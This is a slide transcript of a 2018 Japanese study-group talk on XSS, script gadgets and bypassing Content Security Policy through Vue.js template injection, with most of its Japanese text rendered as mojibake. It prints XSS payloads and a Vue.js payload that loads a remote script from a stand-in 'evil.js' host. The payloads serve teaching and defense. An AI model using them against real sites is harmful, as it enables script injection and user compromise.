XSS in the era of *.js - JS ライブラリ時代の XSS (ゼロから始めるセキュリティ入門勉強会 #15)

Transcript

1. <html> <head> <meta charset="utf-8"> <title>Vue.js Security Testing</title> <script src="vue.js" nonce="random"></

   script> </head> <body> <div id="example"> <p>{{this. $el.ownerDocument.defaultView.alert(1)}}</p> </div> <script src="init.js" nonce="random2"></ script> </body> </html> XSS in the era of *.js
 JS ϥΠϒϥϦ࣌୅ͷ XSS Takashi Yoneuchi @lmt_swallow https://shift-js.info

2. © 2018 shift-js.info All Rights Reserved. Outline ‣ Overview: XSS

   ‣ XSS ͱ͸ͲΜͳ΋ͷ͔ɾͲΜͳ෼ྨ͕͋Δ͔ΛֶͿ ‣ What is DOM Based XSS? ‣ ಛʹ DbXSS ʹ͍ͭͯɺΑ͋͘Δ۩ମྫ͔ΒݪཧΛֶͿ ‣ Script gadgets: what happens with *.js ? ‣ Script gadgets ͷ࿩ (+ ࠷ۙͷ *.js ͨͪͷొ৔ʹΑΔมԽ) ‣ Example: Let's defeat CSP :-) ‣ Vue.js Λ template compiler ͋ΓͰ࢖͏ͳΒجຊ unsafe-inline ͳ࿩ ‣ Conclusion
   

3. © 2018 shift-js.info All Rights Reserved. Notes ‣ ಛʹٕज़తͳ಺༰ʹؔͯ͠ɺݕূɾϨϏϡʔ͸ؤுͬ ͍ͯͯ͠·͕͢ɺޡΓؚ͕·ΕΔ৔߹͕͋Γ·͢ɻ

   (ൃݟͨ͠Β๻ʹ࿈བྷΛ͍ͩ͘͞!) ‣ ຊࢿྉ͸ޙ೔ΦϯϥΠϯͰެ։͞ΕΔ༧ఆɻ ‣ ࠓճͷൃදͰͷ೚ҙͷൃݴ͸ॴଐ૊৫Λ୅ද͢Δ΋ ͷͰ͸͋Γ·ͤΜ&ࢲݟʹج͖ͮ·͢ɻ
   

4. Overview: XSS

5. © 2018 shift-js.info All Rights Reserved. XSS (Cross-site Scripting)
 ΫϩεαΠτεΫϦϓςΟϯά

   ‣ "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites." (OWASP, https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) ) ‣ ͬ͘͟Γ͍͏ͱ͜͏ ‣ ߈ܸऀ͕ Web αΠτʹεΫϦϓτΛ஫ೖ ‣ ඪతͷϒϥ΢β্ͰͦΕ͕࣮ߦ͞ΕΔ
   

6. © 2018 shift-js.info All Rights Reserved. XSS (Cross-site Scripting)
 ΫϩεαΠτεΫϦϓςΟϯά

   - ྫ
    <h1> ͜Μʹͪ͸, ͭ͹Ί ͞Μ! </h1>

7. © 2018 shift-js.info All Rights Reserved. XSS (Cross-site Scripting)
 ΫϩεαΠτεΫϦϓςΟϯά

   - ྫ
    <h1> ͜Μʹͪ͸, <script>alert(1)</script> ͞Μ! </h1> ‣ ೖྗ஋͕ HTML ͷҰ෦ͱղऍ͞Εɺ<script> ͕࣮ߦ͞Εͯ͠·͏

8. © 2018 shift-js.info All Rights Reserved. Three kinds of XSS


   3 छͷ XSS ‣ Stored XSS - ஝ੵܕ XSS (ޮՌ͕࣋ଓ͢Δ) ‣ DB ౳ʹอଘ͞ΕͨϢʔβʔೖྗ஋͕ग़ྗ͞ΕΔࡍͷ XSS ‣ Reflected XSS - ൓ࣹܕ XSS: (ޮՌ͸࣋ଓ͠ͳ͍) ‣ ϢʔβʔೖྗΛ͙ͦ͢ͷ৔Ͱग़ྗ͢Δࡍͷ XSS
 ‣ DOM Based XSS - ࠷ۙͷྲྀߦΓ
    <?php echo 'hello, '. $stored_value; ?> <?php echo 'hello, '. $_GET['name']; ?>

9. © 2018 shift-js.info All Rights Reserved. 1. Stored XSS
 ஝ੵܕ

   XSS
    1. ѱҙͷ͋ΔεΫϦϓτΛೖྗ஋ͱͯ͠஫ೖ
 (e.g. ϒϩάͷίϝϯτͱͯ͠ <script>alert(1)</script> Λૹ৴) 2. อଘ 4. DB ͔ΒͷಡΈग़͠ 3. αΠτʹΞΫηε 5. εΫϦϓτ஫ೖࡁίϯςϯπͷฦ٫
 e.g. <div id="comment"><script>alert(1)</script></div>

10. © 2018 shift-js.info All Rights Reserved. 2. Reflected XSS
 ൓ࣹܕ

    XSS
     1. ѱҙͷ͋ΔεΫϦϓτؚ͕·ΕΔϦΫΤετΛ
 ඪత͕ൃߦ͢ΔΑ͏༠ಋ
 (e.g. http://example.com/?search=<script>alert(1)</script>) 2. ඪత͕༠ಋ͞ΕͯϦΫΤετΛൃߦ 3. εΫϦϓτ஫ೖࡁίϯςϯπͷฦ٫
 e.g. <h1> <script>alert(1)</script> Ͱͷݕࡧ݁Ռ </h1>

11. © 2018 shift-js.info All Rights Reserved. Example: Stored & Reflected

    XSS
 ஝ੵܕ XSS ͱ൓ࣹܕ XSSͷྫ ‣ αʔόʔαΠυͰϢʔβʔೖྗ஋Λ࢖ͬͯ HTML Λߏ ੒͢ΔࡍͷΤεέʔϓ࿙Ε͕ݪҼ ‣ ରࡦ ‣ ໽հͳέʔε͕ͨ͘͞Μ͋ͬͯେม ‣ ྫ͑͹ htmlspecialchars() ͷΑ͏ͳΤεέʔϓΛ௨͢
     <?php echo 'hello, '. $potentially_malicious_value ; ?>

12. © 2018 shift-js.info All Rights Reserved. 3. DOM Based XSS

    
     1. ѱҙͷ͋ΔεΫϦϓτؚ͕·ΕΔϦΫΤετΛ
 ඪత͕ൃߦ͢ΔΑ͏༠ಋ
 (e.g. http://example.com/#query=<script>alert(1)</script>) 2. ඪత͕༠ಋ͞ΕͯϦΫΤετΛൃߦ 3. ਖ਼نίϯςϯπͷฦ٫ 4. DOM ૢ࡞ʹΑΓ XSS ൃՐ
 <script>document.getElementById("contents").innerHTML=location.hash.substring(1);</script>

13. What is DOM Based XSS ? - with common examples

    -

14. © 2018 shift-js.info All Rights Reserved. <section> DOM
 Document Object

    Model ‣ HTML (΍ XML) ͷߏ଄ʹ ΞΫηε͢ΔͨΊͷ࿮૊ ‣ จষߏ଄Λ Tree ܗͷϞσ ϧͱͯ࣋ͭ͠ ‣ WHATWG ʹΑΔఆٛ
 https://dom.spec.whatwg.org
     <body> <header> <main> <h2> <section> <p> <h2> <p>

15. © 2018 shift-js.info All Rights Reserved. What is DOM Based

    XSS?
 DOM Based XSS ͱ͸ ‣ "DOM Λ௨ͨ͡ HTML ૢ࡞ͷ݁Ռͱͯ͠ɺҙਤ͠ͳ͍ε ΫϦϓτ͕࣮ߦ͞ΕΔ͜ͱ΍ɺͦΕΛڐ͢੬ऑੑΛࢦ͠ ͯɺDOM Based XSS ͱ͍͏ɻ" (IPA ςΫχΧϧ΢ΥονʮDOM Based XSSʯʹؔ͢ΔϨ ϙʔτ https://www.ipa.go.jp/files/000024729.pdf) ‣ Stored XSS ΍ Reflected XSS ͱͷҧ͍ ‣ αʔόʔ͸͋͘·Ͱ "ਖ਼نίϯςϯπ" Λฦ͢ ‣ αʔόʔΛ߈ܸεΫϦϓτ͕ܦ༝͠ͳ͍Մೳੑ͕͋Δ ‣ e.g. http://example.com/#<script>alert(1)</script> (ϑϥάϝϯτࣝผࢠͷར༻)
    

16. © 2018 shift-js.info All Rights Reserved. Common example
 DbXSS ͷΑ͋͘Δྫ

    ‣ example.com ্Ͱ্ه JS ͕࣮ߦ͞ΕΔ৔߹ɺ ྫ͑͹ඪతΛ࣍ͷΑ͏ͳ URL ʹ༠ಋ͢Δͱʁ
 http://example.com/#<img src=x%20onerror%3Dalert(1)>
     <script> p = document.getElementById("username"); p.innerHTML = "<p>you are " + location.hash.substring(1) + "</p>"; </script>

17. © 2018 shift-js.info All Rights Reserved. Common example
 DbXSS ͷΑ͋͘Δྫ

    ‣ ͜ͷ <script> λάࣗମ͸ແ֐ (ѱ͍͜ͱ͸ͯ͠ͳ͍) ‣ location.hash ͷ஋͕લท <img ...> Ͱ΋ɺͦΕ͚ͩͳΒແ֐ ͔ͭ non-executable ‣ innerHTML ʹલท <img ... > ͷΑ͏ͳ location.hash ͷ஋͕ೖΔ ͱ executable ʹͳΔ
     <script> p = document.getElementById("username"); p.innerHTML = "<p>you are " + location.hash.substring(1) + "</p>"; </script>

18. © 2018 shift-js.info All Rights Reserved. Common example
 DbXSS ͷΑ͋͘Δྫ

    ‣ ͜ͷ <script> λάࣗମ͸ແ֐ (ѱ͍͜ͱ͸ͯ͠ͳ͍) ‣ location.hash ͷ஋͕લท <img ...> Ͱ΋ɺͦΕ͚ͩͳΒແ֐ ͔ͭ non-executable ‣ innerHTML ʹલท <img ... > ͷΑ͏ͳ location.hash ͷ஋͕ೖΔ ͱ executable ʹͳΔ
     <script> p = document.getElementById("username"); p.innerHTML = "<p>you are " + location.hash.substring(1) + "</p>"; </script> 4PVSDF
    ͱݺͿ 4JOL
    ͱݺͿ

19. © 2018 shift-js.info All Rights Reserved. Sources & Sinks 


    ιʔεͱγϯΫ ‣ Source - ߈ܸऀ͕ίϯτϩʔϧͰ͖Δ஋ e.g. location.hash, location.search, location.href, ... e.g. document.cookie, document.referrer, ... e.g. window.name, ... ‣ Sink - JS ੜ੒ & ࣮ߦʹ࢖ΘΕ͏ΔՕॴ e.g. location.href (redirect) e.g. HTMLElement.innerHTML e.g. document.write e.g. eval, setTimeout, setInterval, Function
    

20. © 2018 shift-js.info All Rights Reserved. What makes the matters

    worse
 DbXSS ͷԿ͕໰୊ͳͷ͔ ‣ DOM Based XSS ͸ ਖ਼نίϯςϯπ্Ͱى͖Δ ‣ DbXSS Ҏ֎ͷ 2छ: ஫ೖ͞ΕͨεΫϦϓτ͕ executable ͳܗ (<script>, onerror=... ౳) Ͱฦͬͯ͘Δ(Ԛછࡁ) ‣ DbXSS: non-executable ͳεΫϦϓτ͕ฦ͖ͬͯͯ(Ԛછ લ)ɺϒϥ΢βαΠυͰͦΕ͕ executable ʹͳΔ ‣ αʔόʔαΠυʹϩά͕࢒Βͳ͍৔߹΋͋Δ ‣ ඃ֐ͷ೺Ѳ͕೉͍͠ (e.g. location.hash ΁ͷ஫ೖ஋͸ϦΫΤετதʹؚ·Εͳ͍) ‣ XSS filter ͳͲͷϒϥ΢β๷ޚػೳͷόΠύεʹ΋࢖͑Δ [4]
    

21. © 2018 shift-js.info All Rights Reserved. When the text can

    be turned into an evil
 DbXSS ͷྲྀΕ
     ϒϥ΢β http://example.com/#<img src=x%20onerror%3Dalert(1)> ※ ϒϥ΢β͕ड͚औΔॠؒ͸
 ͋͘·Ͱແ֐ͳίϯςϯπ source source sink DOM ૢ࡞

22. © 2018 shift-js.info All Rights Reserved. Increasing & diversifying threats


    ૿Ճɾଟ༷Խ͢Δ Db XSS ͷڴҖ ‣ DOM ૢ࡞ͳ͠Ͱ࡞ΒΕΔ Web αΠτ͸গͳ͍ (or ͳ͍) ‣ JS ͕ංେԽ͢Ε͹͢Δ΄Ͳݟ͚ͭʹ͍͘ ‣ ͦΜͳத XSS ͸΋͸΍ϒϥ΢β্͚ͩͷ໰୊Ͱ͸ͳ͍ ‣ e.g. Electron ‣ Web ։ൃͷٕज़Ͱ Desktop Apps Λ࡞ΕΔ ‣ XSS ͷڴҖ͕ΑΓԼͷϨΠϠʹۙͮ͘
    

23. © 2018 shift-js.info All Rights Reserved. NOTE:
    

24. © 2018 shift-js.info All Rights Reserved. Overview: XSS
 ͜͜·Ͱͷ·ͱΊ &

    ֶ࣍Ϳ΂͖࿩୊ ‣ XSS (Cross-site Scripting) ͸େ͖͘෼͚ͯ 3 छྨ ‣ ( Stored | Reflected | DOM Based ) XSS
 ‣ ҰॹʹԞਂ͍ XSS ͷੈքΛ୳ࡧ͠·͠ΐ͏ ! ‣ จࣈίʔυͷऔѻʹىҼͨ͠ XSS [5] ‣ IE ͷ Content Sniffing ʹىҼͨ͠ XSS [6] ‣ ͦͷଞ໘ന͍࿩͸୔ࢁɻ
    

25. Script gadgets: 
 what happens with *.js

26. © 2018 shift-js.info All Rights Reserved. What did *.js make?


    *.js ͕΋ͨΒͨ͠΋ͷ ‣ jQuery ΍ *.js (e.g. Angular.js, Vue.js, ...) ͷొ৔Ͱ Web ։ൃ͸ܶతʹ (ྑ͍ํ޲ʹ?) มΘͬͨ ‣ MVC (MVW) ‣ getElementBy* ஍ࠈ͔Βͷղ์ ‣ ৽ͨͳܗͷ XSS (ݴ͍͔͗͢΋…) ͕ొ৔͖ͯͨ͠ ‣ data-* ΍ ng-* (Angular.js) , v-* (Vue.js) ͳͲͷ attributes Λ ར༻ͨ͠ XSS
    

27. © 2018 shift-js.info All Rights Reserved. Script gadgets - example


    Script gadget ͱ͸Կ͔ - ۩ମྫΛݟͯΈΔ ‣ 2017 ೥ʹ @slekies Β͕ൃද ‣ "By injecting benign HTML markup matching DOM selectors used in the application we are able to trigger the execution of specific pieces of legitimate application code - script gadgets." [2]
     <script> p = document.getElementById("username"); p.innerHTML = "<p>you are " + location.hash.substring(1) + "</p>"; </script> ͜ͷεΫϦϓτஅยΛ gadget ͱݺͿ

28. © 2018 shift-js.info All Rights Reserved. What makes the matters

    worse
 DbXSS ͷԿ͕໰୊ͳͷ͔ ‣ DOM Based XSS ͸ ਖ਼نίϯςϯπ্Ͱى͖Δ ‣ DbXSS Ҏ֎ͷ 2छ: ஫ೖ͞ΕͨεΫϦϓτ͕ executable ͳܗ (<script>, onerror=... ౳) Ͱฦͬͯ͘Δ(Ԛછࡁ) ‣ DbXSS: non-executable ͳεΫϦϓτ͕ฦ͖ͬͯͯ (Ԛછલ)ɺϒϥ΢βαΠυͰͦΕ͕ executable ʹͳΔ ‣ αʔόʔαΠυʹϩά͕࢒Βͳ͍৔߹΋͋Δ → ඃ֐ͷ೺ Ѳ͕೉͍͠ (e.g. location.hash ΁ͷ஫ೖ஋͸ϦΫΤετதʹؚ·Εͳ͍)
     ͜͜ΛҾ͖ى͜͢ͷ͕ Script gadget

29. © 2018 shift-js.info All Rights Reserved. When the text can

    be turned into an evil
 Script gadgets ͷߟ͑ํ
     ϒϥ΢β p.innerHTML = "<p>" + location.hash.substring(1) + "</p>"; Script gadgets http://example.com/#<img src=x%20onerror%3Dalert(1)> ※ ϒϥ΢β͕ड͚औΔॠؒ͸
 ͋͘·Ͱແ֐ͳίϯςϯπ source source sink

30. © 2018 shift-js.info All Rights Reserved. Script gadgets - details

    ‣ Script gadgets ͸ແ֐ͳ HTML λά΍ଐੑΛ࣮ߦՄ ೳͳ JS ʹม׵ɾ࣮ߦͯ͘͠ΕΔίʔυஅยͷ͜ͱɻ ‣ e.g. ࣍ͷΑ͏ͳม׵Λߦ͏ JS (data-text ͸ຊདྷແ֐!) ‣ *.js ͨͪͷதʹ͸͜ͷྫͷΑ͏ͳૢ࡞Λ͢Δ΋ͷ͕͍Δ
     <p data-text="&lt;script&gt;alert(1)&lt;/script&gt;"></p> <p><script>alert(1)</script></p>

31. © 2018 shift-js.info All Rights Reserved. XSS with script gadgets

    ‣ ༷ʑͳ๷ޚػߏ͕ճආ͞Ε͏Δ (ύλʔϯ͸ແ਺!) ‣ XSS filters, WAF, HTML Sanitizer, CSP, ...
 ‣ ͦΕΒ͍࣮͠ྫ ‣ Bootstrap3 ͷ data-target Λ࢖ͬͨ XSS (2016) 
 (https://github.com/twbs/bootstrap/issues/20184) ‣ H5SC Minichallenge 3 (CSP ؀ڥԼͰͷ XSS) (2015)
 (https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,- it%27s-CSP!%22)
    

32. © 2018 shift-js.info All Rights Reserved. What makes the matters

    worse *.js ͷԿ͕໰୊ͳͷ͔ ‣ ߈ܸख๏ & Script gadgets ͷඈ༂త૿Ճ ‣ CSP (Content-Security-Policy) bypass ʹར༻Մೳ ‣ strict-dynamic ؀ڥԼͰ͸ DOM πϦʔʹૠೖ͞Εͨ script λάͷ࣮ߦ͕ڐՄ͞ΕΔ ‣ notevil ͷΑ͏ͳ eval ୅ସΛ࢖͍ͬͯΔ΋ͷ (e.g. Vue.js ͷ CSP Ϗϧυ) Ͱ͸ strict-dynamic ͳ͠ & unsafe-* ͳ͠Ͱ΋೚ҙ ίʔυ࣮ߦ͕Մೳ ‣ ʮCSP ࢖ͬͯΔ͔Β XSS ා͘ͳ͍ʂʯͳΜ͍ͯ͑ͳ͍ɻ
    

33. Example: Let's defeat CSP :-) - Vue.js is your strong

    friend! -

34. © 2018 shift-js.info All Rights Reserved. What is Vue.js ?

    
 Vue.js - The Progressive JavaScript Framework ‣ "Vue ͸ϢʔβʔΠϯλʔϑΣΠεΛߏங͢ΔͨΊͷϓϩά ϨογϒϑϨʔϜϫʔΫͰ͢ɻ" ( https://jp.vuejs.org/v2/guide/ ) ‣ σʔλόΠϯσΟϯά (JS ม਺ͷมߋ͕ UI ʹଈ࣌൓ө͞ΕΔ) ͳͲศར
     <script> new Vue({ el: "#content", data: { message: "Hello" } }); </script> <div id="content"><p> {{ message }} </p></div>

35. © 2018 shift-js.info All Rights Reserved. Are you safe from

    XSS with Vue.js?
 Vue.js ʹ͓͚Δ XSS ͷݪҼ ‣ ϨϯμϦϯά͕ى͜ΔՕॴͰ෼ྨͯ͠ΈΔ 1. αʔόʔαΠυϨϯμϦϯάͰͷෆඋ (Α͋͘Δ XSS) 2. ΫϥΠΞϯταΠυϨϯμϦϯάͰͷෆඋ ‣ v-html, {{{ }}} ʹΑΔ HTML ͷల։ʹΑΔ XSS ‣ ຊ࣭: αʔόʔଆ͔Β (ਖ਼نίϯςϯπҎ֎ͷ) HTML ͕ಈతʹ߱ͬ ͯ͘Δ(≒ αʔόʔαΠυϨϯμϦϯά) + ͦΕ͕ඳը͞ΕΔ (ΫϥΠΞϯταΠυϨϯμϦϯά) ͷࠞ༻͕ݪҼ ‣ ศ্ٓɺΤεέʔϓͳ͠ͰσʔλΛฦͯ͠͠·͏৔߹΋ɺ࣮࣭αʔ όʔαΠυϨϯμϦϯάͱଊ͍͑ͯ·͢
    

36. © 2018 shift-js.info All Rights Reserved. How to use Vue.js

    with CSP ?
 CSP ؀ڥԼͰͷ Vue.js ͷ࢖͍ํ ‣ ར༻Մೳͳ Vue.js ͱ CSP ͷ૊Έ߹Θͤ͸ҎԼ ‣ CSP: (host|schema)-source & unsafe-eval
 Vue.js: full build ͷར༻ (template compiler ͋Γ) ‣ CSP: (hash|nonce)-source & unsafe-eval (& strict-dynamic)
 Vue.js: full build ͷར༻ (template compiler ͋Γ) ‣ CSP: (specify as you like)
 Vue.js: CSP build ͷར༻ (template compiler ͋Γ) ‣ CSP: (specify as you like)
 Vue.js: runtime-only build ͷར༻ (template compiler ͳ͠)
     ※ full build: Vue.js v2.x ܥ, CSP build: v.1.x ܥ೿ੜͷ CSP branch Λࢦ͢

37. © 2018 shift-js.info All Rights Reserved. Situation
 Ҏ߱ͷٞ࿦ʹ͍ͭͯͷԾఆ ‣ Ҏ߱ɺҎԼͷঢ়گΛԾఆ͠·͢

    (݁ߏݱ࣮ʹ͋Γ͏Δγνϡ)ɻ ‣ Vue.js ͷ template compiler Λ࢖͍͍ͨɻ ‣ XSS ͕ଘࡏ͠ɺ೚ҙλάΛૠೖͰ͖Δɻ ‣ CSP ͸ Vue.js ͕࢖͑ΔܗͰదٓఆΊΒΕ͍ͯΔ ‣ ͨͩ͠ৗʹ unsafe-inline ͸ઃఆ͠ͳ͍ɻ ‣ CSP ʹΑΓɺ(ͺͬͱݟ) XSS ͷࣗ༝౓͸௿͍ʁ ‣ ΠϯϥΠϯεΫϦϓτ࣮ߦ͸Ͱ͖ͳͦ͞͏(∵ unsafe-inline ͳ͠)
    

38. © 2018 shift-js.info All Rights Reserved. How to use Vue.js

    with CSP ?
 CSP ؀ڥԼͰͷ Vue.js ͷ࢖͍ํ ‣ ར༻Մೳͳ Vue.js ͱ CSP ͷ૊Έ߹Θͤ͸ҎԼ ‣ CSP: (host|schema)-source & unsafe-eval
 Vue.js: full build ͷར༻ (template compiler ͋Γ) ‣ CSP: (hash|nonce)-source & unsafe-eval (& strict-dynamic)
 Vue.js: full build ͷར༻ (template compiler ͋Γ) ‣ CSP: (specify as you like)
 Vue.js: CSP build ͷར༻ (template compiler ͋Γ) ‣ CSP: (specify as you like)
 Vue.js: runtime-only build ͷར༻ (template compiler ͳ͠)
     ͜ΕΒ
    ͭͷέʔεΛߟ͑Δ

39. © 2018 shift-js.info All Rights Reserved. IDEA 1: inline script

    execution without unsafe-inline
     ‣ Vue.js Ͱ template compiler Λ ࢖͏ʹ͸ eval ૬౰ͷػೳ͕ඞཁ
 (CSP build Ͱ΋ full build Ͱ΋) ‣ ͜Εʹ৐͔ͬΕ͹εΫϦϓτͷ ΠϯϥΠϯ࣮ߦ͕unsafe-inline ແ͠Ͱ΋Ͱ͖ΔͷͰ͸ʁ

40. © 2018 shift-js.info All Rights Reserved. Example: XSS with Vue.js

    (* build)
 @error ಺Ͱͷ೚ҙ JS ࣮ߦ ‣ v-on த $event.target.ownerDocument.defaultView 
 ͸ CSP build Ͱ΋ full build Ͱ΋ window ʹ౳͍͠ ‣ ͦ͜Ͱ࣍ͷλάΛૠೖ͢Δ͜ͱΛߟ͑Δ
 ‣ @error ಺෦͸࣍ͷܗʹม׵͞ΕΔ
 scope.$event.target.ownerDocument.defaultView.alert(1) ‣ ͜Ε͸ window.alert(1) ͱ౳ՁͳͷͰ alert ͕ग़Δɻ ‣ unsafe-inline ͳ͠Ͱ΋ΠϯϥΠϯ࣮ߦ͕Մೳ
     <img src=x @error="$event.target.ownerDocument.defaultView.alert(1)">

41. © 2018 shift-js.info All Rights Reserved. Example: XSS with Vue.js

    (* build) 
 v-if ΍ {{ }} Ͱͷ೚ҙ JS ࣮ߦ
     <img v-if="1)+this. $el.ownerDocument.defaultView.alert(1)+(1"> ‣ full build + unsafe-eval Ͱ͸͜ΕͰ alert . <img v-if="this. $el.ownerDocument.defaultView.alert(1)"> ‣ CSP build Ͱ͸͜Ε͚ͩͰ alert . ‣ ্هͲͪΒͷ build & policy Ͱ΋͜ΕͰ alert. <p>{{this. $el.ownerDocument.defaultView.alert(1}}</p>

42. © 2018 shift-js.info All Rights Reserved. Example: XSS with Vue.js

    (* build) 
 ·ͱΊ: Vue.js Λ࢖ͬͨ XSS ͷେ·͔ͳ෼ྨ (1) ‣ {{ }} (mustache ͱݺͿ) Λ࢖ͬͨ JS ࣮ߦ ‣ <p>{{ this.$el.ownerDocument.defaultView.alert(1) }}</p> ‣ client-side ͳ template injection ͷΑ͏ͳײ͡ ‣ ಛ༗ͷ directive Λ༻͍ͨ JS ࣮ߦ ‣ v-on directive (@ Ͱ୅༻Մೳ) ‣ e.g. @click="$event.target.ownerDocument.defaultView.alert(1)" ‣ v-show, v-if, v-for, v-bind directive ‣ v-on ಉ༷༩͑ͨจࣈྻ͕ JS ͱͯ͠ධՁ͞ΕΔ
    

43. © 2018 shift-js.info All Rights Reserved. Example: XSS with Vue.js

    (* build)
 ·ͱΊ: Vue.js Λ࢖ͬͨ XSS ͷେ·͔ͳ෼ྨ (2) ‣ ݩདྷͷ DOM Based XSS ʹ͍ۙܗͷ XSS ‣ source: Vue Πϯελϯεͷ data, computed, ... ‣ sink: v-html ΍ {{{ }}} ʹΑΔల։ (ޙऀ͸ 1 ܥͷΈ)
     <script> new Vue({ el: "#content", data: { raw: "<s>deleted</s>" } }); </script> <div id="content"><span v-html="raw"></span></div>

44. © 2018 shift-js.info All Rights Reserved. IDEA 2: ONE MORE

    THING...
     ‣ εΫϦϓτͷΠϯϥΠϯ࣮ߦ͕ unsafe-inline ແ͠Ͱ΋Ͱ͖Δͱ ͍͏͜ͱͰ͸ʁ → Ͱ͖ͨ! ‣ ͨͩෳจ࣮ߦ΍είʔϓʹ੍໿ ͕͋ͬͨΓͯ͠໘౗ͩ͠ɺ΋ͬ ͱࣗ༝ʹ XSS ͍ͨ͠ʂ

45. © 2018 shift-js.info All Rights Reserved. Let's be free from

    CSP (full build)
 full build + unsafe-eval Ͱͷ ೚ҙ source ͷ full bypass ‣ full build + unsafe-eval Ͱ͋Ε͹ɺ੍໿͔Βͷ࣍ͷ Α͏ͳ୤ग़͕Մೳ (ͱͬͯ΋؆୯)ɻ
     <img v-if="1)])+this. $el.ownerDocument.defaultView.eval('..');}//"> ‣ Vue.$mount ͔Βݺ͹ΕΔ compileToFunctions ؔ਺ͷಈ͖ΛಡΜͰΈΔ͜ͱΛ͓͢͢Ί͠·͢

46. © 2018 shift-js.info All Rights Reserved. Let's be free from

    CSP (CSP build)
 CSP build ͷ nonce-sources ΍ strict-dynamic ͷ full bypass ‣ nonce-source ʹΑΔࢦఆ͸࣍ͷΑ͏ʹ bypass Մೳɻ
 ( script-src 'nonce-random' 'unsafe-eval'; ͷΑ͏ͳࢦఆͷ৔߹ )
     <div id="app"><img v-show=" (document=this.$el.ownerDocument) &&(a=document.createElement('script')) &&(a.nonce=document.currentScript.nonce) &&(a.src='http://example.com/evil.js') &&(document.body.appendChild(a))"></div> ‣ strict-dynamic bypass ͸্هͷιʔε͔Β a.nonce ͷߦΛ࡟আ ͢Ε͹Α͍(ͪ͜Βͷํ͸؆୯)ɻ

47. © 2018 shift-js.info All Rights Reserved. Bypassability of CSP with

    Vue.js
 unsafe-inline ະࢦఆͷ৔߹ͷ෼ྨ
     CVJME XIJUFMJTU OPODF OPODF
    

    TE GVMM

    VF GVMMZ
    
 CZQBTTBCMF GVMMZ
    
 CZQBTTBCMF GVMMZ
    
 CZQBTTBCMF $41 QBSUJBMMZ
    CZQBTTBCMF GVMMZ
    CZQBTTBCMF GVMMZ
    
 CZQBTTBCMF SVOUJNFPOMZ ‣ template compiler Λ࢖͏৔߹͸େମ bypassable ( ue = unsafe-eval, sd = strict-dynamic )

48. © 2018 shift-js.info All Rights Reserved. Example: XSS with Vue.js

    (CSP build)
 ੔ཧ: CSP ؀ڥԼͰ Vue.js Λ࢖͏ࡍͷ XSS ʹ͍ͭͯ ‣ ͋Δϖʔδ͕࣍ͷ৚݅Λຬͨ࣌͢͸ɺCSP ؀ڥԼ Ͱ΋ɺ࣮࣭ unsafe-inline ঢ়ଶʹͳͬͯ͠·͏ɻ ‣ Vue.js Λ࢖͍ͬͯΔ ‣ ͦͷ template compiler Λ࢖͍ͬͯΔ ‣ CSP ͷઃఆʹΑͬͯ͸೚ҙ <script> ͷϩʔυ΍ૠ ೖʹ΋ͭͳ͕ͬͯ͠·͏ (e.g. nonce, hash ܥࢦఆ)
    

49. © 2018 shift-js.info All Rights Reserved. Are you safe from

    XSS with Vue.js?
 Vue.js ʹ͓͚Δ XSS ͷݪҼ ‣ ϨϯμϦϯά͕ى͜ΔՕॴͰ෼ྨͯ͠ΈΔɻ 1. αʔόʔαΠυϨϯμϦϯάͰͷෆඋ (Α͋͘Δ XSS) 2. ΫϥΠΞϯταΠυϨϯμϦϯάͰͷෆඋ ‣ v-html, {{{ }}} ʹΑΔ HTML ͷల։ʹΑΔ XSS ‣ ຊ࣭: αʔόʔଆ͔Β (ਖ਼نίϯςϯπҎ֎ͷ) HTML ͕ಈతʹ߱ͬͯ ͘Δ(≒ αʔόʔαΠυϨϯμϦϯά) + ͦΕ͕ඳը͞ΕΔ (Ϋ ϥΠΞϯταΠυϨϯμϦϯά) ͷࠞ༻͕ݪҼ ‣ ศ্ٓɺΤεέʔϓͳ͠ͰσʔλΛฦͯ͠͠·͏৔߹΋ɺ ࣮࣭αʔόʔαΠυϨϯμϦϯάͱଊ͍͑ͯ·͢
    

50. © 2018 shift-js.info All Rights Reserved. How to use Vue.js

    safely
 Vue.js Λฏ࿨ʹ࢖͏ʹ͸ ‣ େલఏ: αʔόʔαΠυϨϯμϦϯάͱΫϥΠΞϯ ταΠυϨϯμϦϯάΛࠞ༻͠ͳ͍ (Vue.js ʹݶΒͣ) ‣ Vue.js Λ࢖͏ͳΒɺαʔόʔαΠυϨϯμϦϯάΛ ݶΓͳ͘ݮΒ͢ (೉͍͚͠ΕͲ…) ‣ Template compiler Λۃྗ࢖Θͳ͍ɻtemplate: Ͱ ͸ͳ͘ɺrender: Λ࢖͓͏ɻ ‣ ϓϦίϯύΠϧ͢Δ
    

51. Conclusion

52. © 2018 shift-js.info All Rights Reserved. ·ͱΊ ‣ XSS (Cross-site

    Scripting) ͸େ͖͘෼͚ͯ 3 छྨ ‣ ( Stored | Reflected | DOM Based ) XSS
 ‣ JS ϥΠϒϥϦ͕ essential ʹͳ͖ͬͯͨ͜ͱͰɺXSS ͷόϦΤʔγϣϯ͕޿͕͖ͬͯͨ ‣ JS ϥΠϒϥϦ࢖༻࣌ʹ͸͜ͷ͜ͱΛ಄ʹཹΊΑ͏ ‣ CSP bypass ʹ࢖ΘΕΔ৔߹΋͋Δ
    

53. Thank you for listening :-) Any Questions? Takashi Yoneuchi (

    @lmt_swallow ) https://shift-js.info

54. © 2018 shift-js.info All Rights Reserved. References (1) XSS࠶ೖ໳ (@ockeghem

    ઌੜ)
 ʰಙؙຊʱͷಙؙઌੜ͕ XSS ͱ͸Կ͔ɺͲ͏໰୊ͳͷ͔Λ·ͱΊͨࢿྉɻ
 ˠ https://www.slideshare.net/ockeghem/xssreintroduction (2) S. Lekies, K. Kotowicz, S. Groß, E. A. V. Nava, and M. Johns, “Code-Reuse Attacks for the Web : Breaking Cross-Site Scripting Mitigations via Script Gadgets,” ACM SIGSAC Conf. Comput. Commun. Secur., pp. 1709–1723, 2017. (3) Breaking XSS mitigations via Script Gadgets 
 https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM- Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf
 POC ͨͪ https://github.com/google/security-research-pocs/tree/master/script-gadgets
    

55. © 2018 shift-js.info All Rights Reserved. References (4) Browser's XSS

    Filter Bypass Cheat Sheet
